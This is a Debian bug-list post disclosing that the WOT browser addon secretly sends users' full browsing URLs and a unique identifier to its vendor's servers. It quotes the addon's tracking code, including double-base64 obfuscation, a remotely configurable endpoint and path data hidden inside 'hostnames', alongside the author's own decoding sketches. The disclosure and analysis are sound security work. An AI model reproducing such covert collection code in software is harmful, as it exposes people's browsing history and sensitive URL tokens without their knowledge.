[Pkg-mozext-maintainers] Bug#842939: WOT found guilty to sell user data

kpcyrd kpcyrd at rxv.cc
Thu Nov 3 05:37:44 UTC 2016


I've had a look at the source and I can confirm the tracking code is present in Debian.

Please read this blog post first:
https://www.kuketz-blog.de/wot-addon-wie-ein-browser-addon-seine-nutzer-ausspaeht/ (German)
https://translate.google.com/translate?hl=en&sl=auto&tl=en&u=https%3A%2F%2Fwww.kuketz-blog.de%2Fwot-addon-wie-ein-browser-addon-seine-nutzer-ausspaeht%2F (English)

It's worth a read. The tl;dr is: the author discovered that the addon
sends your browser history together with a unique identifier to mywot
servers. The author then set up a virtual machine with Linux, Firefox
and no addons besides WOT. Later, the canary dataset was found inside
the data dump that was acquired by the NDR.

This is the version in stretch and later:

There's an event handler for `onLocationChange` that is passing the tab
location to `wot_stats.loc`:

```
			if (tabUrl && wot_stats.isWebURL(tabUrl)) {
				var ref = browser.contentDocument.referrer;
				if (request && request.referrer && typeof(request.referrer) != undefined) {
					ref = request.referrer.asciiSpec;
				}

				wot_stats.loc(tabUrl, ref);
			}
```
https://sources.debian.net/src/wot/20151208-2/content/core.js/#L81

`wot_stats.loc` then calls `wot_stats.query`, which sends the data to a
server (https://secure.mywot.com at the time of writing; the endpoint is
remotely configurable, I'll cover that later). Comments that I added
myself are marked with (kpcyrd).

```
        data = {
            "s":WOT_STATS.SID,
            "md":21,
            "pid":wot_stats.getUserId(),
            "sess":wot_stats.getSession()['id'],
            "q":encodeURIComponent(url), //(kpcyrd): this is the current url
            "prev":encodeURIComponent(wot_stats.last_prev), //(kpcyrd): this is the previously seen url
            "link":0,
            "sub": "ff",
            "tmv": WOT_STATS.VER,
            "hreferer" : encodeURIComponent(ref), //(kpcyrd): this seems to be a referer, but I didn't investigate further
            "ts" : wot_stats.utils.getCurrentTime()
        };

        var requestDataInfo = this.utils.serialize(data);
        var requestData = requestDataInfo.data;
        var requestLength = requestDataInfo.length;

        var encoded = btoa(btoa(requestData)); //(kpcyrd): base64 encode twice
        if (encoded != "") {
            var data = "e=" + encodeURIComponent(encoded);
            var statsUrl = settings[this.urlKey] + "/valid"; //(kpcyrd): get the endpoint from the config
            this.utils.postRequest(statsUrl, data, requestLength); //(kpcyrd): send data to the server, there's a unique identifier in the cookies
        }
        this.last_prev = url; //(kpcyrd): set the current url as previous url for the next request

```
https://sources.debian.net/src/wot/20151208-2/content/stats.js/#L280

After decoding the base64, the resulting request looks like this:
https://media.kuketz.de/blog/artikel/2016/wot-addon/unmaskiert2.jpg

As far as I can tell, this is happening for every page load.
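
To check a captured request yourself, the encoding can be reversed
step by step. This is only a minimal sketch for Node.js, assuming the
POST body has the form `e=<value>` as built in the code quoted above.
The function name and the sample payload are made up for illustration,
and the exact output format of `utils.serialize` is not reproduced here.

```javascript
// Sketch: undo the encoding applied in wot_stats.query to a POST body.
// Assumption: body is "e=" + encodeURIComponent(btoa(btoa(payload))).
function decodeStatsBody(body) {
    var match = /^e=(.*)$/.exec(body);
    if (!match) {
        return null; // not a stats request body
    }
    var encoded = decodeURIComponent(match[1]);
    // btoa/atob work on latin1 "binary strings", so decode as latin1
    var once = Buffer.from(encoded, "base64").toString("latin1");
    return Buffer.from(once, "base64").toString("latin1");
}

// Hypothetical payload, only to demonstrate the round trip
var samplePayload = "q=" + encodeURIComponent("https://example.com/account?token=secret");
var innerBase64 = Buffer.from(samplePayload, "latin1").toString("base64");
var outerBase64 = Buffer.from(innerBase64, "latin1").toString("base64");
var sampleBody = "e=" + encodeURIComponent(outerBase64);

console.log(decodeStatsBody(sampleBody));
```

The double base64 layer adds no confidentiality, anyone who can see the
request body can recover the URLs this way.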

The endpoint for that data is dynamic, it's fetched from
https://secure.mywot.com/config when you provide the correct parameters:

```
$ curl 'https://secure.mywot.com/config?s=241&ins=1478145149&ver=1.0'
{"ok":1,"url":"https://secure.mywot.com"}
```

I'm not sure why it works like this. I assume it's meant to obfuscate
the endpoint the data is sent to. The code between this fetch and the
usage quoted above is unnecessarily complicated. The indirection could
also be used to bypass firewalls that try to block this.
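
Stripped of the indirection, the lookup seems to boil down to something
like the following. This is a simplified sketch and not the addon's
code: the function name is made up, and I'm assuming that the `url`
field of the config response is what ends up in `settings[this.urlKey]`
and that `ok` has to be 1.

```javascript
// Sketch: derive the stats endpoint from a /config response body.
// Assumptions: "url" is the value later used as the endpoint base,
// and a response without ok == 1 is ignored.
function statsUrlFromConfig(responseText) {
    var config;
    try {
        config = JSON.parse(responseText);
    } catch (e) {
        return null; // not valid JSON
    }
    if (!config || config.ok !== 1 || typeof config.url !== "string") {
        return null;
    }
    return config.url + "/valid"; // same suffix as in wot_stats.query
}

// Response body taken from the curl output above
var sampleResponse = '{"ok":1,"url":"https://secure.mywot.com"}';
console.log(statsUrlFromConfig(sampleResponse));
```

If this reading is right, blocking a single hostname is not enough,
because the server can hand out a different `url` at any time.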

The data sent by this tracking code has huge privacy implications.
Because these are full URLs (hostname, path, query string,
anchor/fragment), it also has significant security implications,
especially for applications that store sensitive information in query
strings.
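
To illustrate what a full URL can carry, here is a small example using
the standard `URL` class. The URL itself is invented, it only stands in
for something like a password reset link.

```javascript
// Hypothetical URL of the kind a web application might generate
var visited = new URL("https://shop.example/reset-password?token=3f9c2a&user=alice#confirm");

// Every one of these parts is included when the full URL is sent
var leaked = {
    hostname: visited.hostname,
    path: visited.pathname,
    query: visited.search,
    fragment: visited.hash,
    token: visited.searchParams.get("token")
};

console.log(leaked);
```

Whoever receives the URL also receives the token, which may be enough
to take over the account until the token expires.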

I've also had a quick look at the version in jessie. At first glance it
"only" operates on hostnames, but when you look into some of the util
functions, this doesn't seem to be the case.

```
	onLocationChange: function(progress, request, location)
	{
		if (progress.DOMWindow != this.browser.contentWindow) {
			return;
		}

		if (location) {
			wot_core.block(this, request, location.spec); //(kpcyrd): this sends data to the server
		}
		wot_core.update();
	},

```
https://sources.debian.net/src/wot/20131118-1/chrome/wot.jar%21/content/core.js/#L62


```
	block: function(pl, request, url)
	{
		try {
			if (!wot_util.isenabled() || !pl || !pl.browser || !url) {
				return;
			}
			
			if (!wot_warning.isblocking()) {
				return;
			}

			var hostname = wot_url.gethostname(url); //(kpcyrd): gethostname, but let's see what it actually does

			if (!hostname || wot_url.isprivate(hostname) ||
					wot_url.isexcluded(hostname)) {
				return;
			}

			if (wot_cache.isok(hostname)) {
				if (wot_warning.isdangerous(hostname, false) ==
						WOT_WARNING_BLOCK) { //(kpcyrd): this is one of the functions causing requests to the server, passing "hostname"
					this.showblocked(pl, request, url, hostname);
				}

				if (this.blockedstreams[url]) {
					delete this.blockedstreams[url];
				}
			} else {
				this.showloading(pl, request, url, hostname);
			}
		} catch (e) {
			dump("wot_core.block: failed with " + e + "\n");
		}
	},
```
https://sources.debian.net/src/wot/20131118-1/chrome/wot.jar%21/content/core.js/#L407


```
	gethostname: function(url)
	{
		try {
			if (!url || !url.length) {
				return null;
			}

			var ios = Components.classes["@mozilla.org/network/io-service;1"]
						.getService(Components.interfaces.nsIIOService);

			var parsed = ios.newURI(url, null, null); //(kpcyrd): parse the url

			if (!parsed || !parsed.host ||
					!this.issupportedscheme(parsed.scheme)) {
				return null;
			}

			var host = parsed.host.toLowerCase(); //(kpcyrd): get the hostname as the function name suggests

			if (!host) {
				return null;
			}

			while (this.isequivalent(host)) {
				host = host.replace(/^[^\.]*\./, "");
			}

			return wot_shared.encodehostname(host, parsed.path); //(kpcyrd): call a function and pass both the hostname, and the path
		} catch (e) {
			/* dump("wot_url.gethostname: failed with " + e + "\n"); */
		}

		return null;
	},
```
https://sources.debian.net/src/wot/20131118-1/chrome/wot.jar%21/content/util.js/#L207


```
	encodehostname: function(host, path) //(kpcyrd): this function doesn't have any purpose besides obfuscating the fact that gethostname contains part of the path
	{
		try {
			if (!host || !path) {
				return host;
			}

			/* Clean up the path, drop query string and hash */
			path = path.replace(/^\s+/, "")
					.replace(/\s+$/, "")
					.replace(/[\?#].*$/, "");
 
			if (path.length < 2 || path[0] != "/") {
				return host;
			}

			var h = wot_idn.utftoidn(host);

			if (!h) {
				return host;
			}

			var c = path.split("/");

			if (!c || !c.length) {
				return host;
			}

			/* Drop a suspected filename from the end */
			if (path[path.length - 1] != "/" &&
					/\.[^\.]{1,6}$/.test(c[c.length - 1])) {
				c.pop();
			}

			var level = 0;

			for (var i = c.length; !level && i > 0; --i) {
				level = this.isshared(h + c.slice(0, i).join("/"));
			}

			if (!level) {
				return host;
			}

			var p = c.slice(0, level + 1).join("/").replace(/^\//, "");

			if (!p || !p.length) {
				return host;
			}

			var encoded = this.base32encode(p);

			if (encoded == null) {
				return host;
			}

			return "_p_" + encoded + "." + host; //(kpcyrd): `encoded` contains parts of the path
		} catch (e) {
			dump("wot_shared.encodehostname: failed with " + e + "\n");
		}

		return host;
	},
```
https://sources.debian.net/src/wot/20131118-1/chrome/wot.jar%21/content/shared.js/#L143
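
To make it easier to see which part of the path can end up in the
"hostname", here is a standalone sketch of the path handling above. It
copies the regular expressions from the quoted code, but `isshared`,
`base32encode` and `wot_idn.utftoidn` are not reproduced since I didn't
quote them. The function names, the ASCII-only host and the `level`
value passed in are assumptions for illustration.

```javascript
// Same clean-up as encodehostname: trim, drop query string and hash,
// drop a suspected filename. Returns the path components or null.
function cleanComponents(path) {
    path = path.replace(/^\s+/, "")
            .replace(/\s+$/, "")
            .replace(/[\?#].*$/, "");
    if (path.length < 2 || path[0] != "/") {
        return null;
    }
    var c = path.split("/");
    if (path[path.length - 1] != "/" &&
            /\.[^\.]{1,6}$/.test(c[c.length - 1])) {
        c.pop();
    }
    return c;
}

// The strings that would be passed to isshared, longest first.
// Assumption: host is plain ASCII, so the IDN conversion is skipped.
function candidatePrefixes(host, path) {
    var c = cleanComponents(path);
    var out = [];
    for (var i = c ? c.length : 0; i > 0; --i) {
        out.push(host + c.slice(0, i).join("/"));
    }
    return out;
}

// The path part that gets base32 encoded for a given (hypothetical) level.
function encodedPathPart(path, level) {
    var c = cleanComponents(path);
    if (!c) {
        return "";
    }
    return c.slice(0, level + 1).join("/").replace(/^\//, "");
}

console.log(candidatePrefixes("example.com", "/users/alice/index.html?x=1#top"));
console.log(encodedPathPart("/users/alice/index.html?x=1#top", 2));
```

So while the query string and fragment are dropped here, leading path
components are kept whenever `isshared` reports a match.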

The jessie version sends less information, but as far as I can see,
this information is sent over plain HTTP to http://api.mywot.com, unless
the addon "httpseverywhere" is installed (the code explicitly checks
whether it's installed).

This is a quick analysis I did within a few hours, so please consider it
incomplete. There might be more issues I didn't cover.

I think this project doesn't align with Debian's goals, and I would
welcome its removal from current and future releases.

thanks.


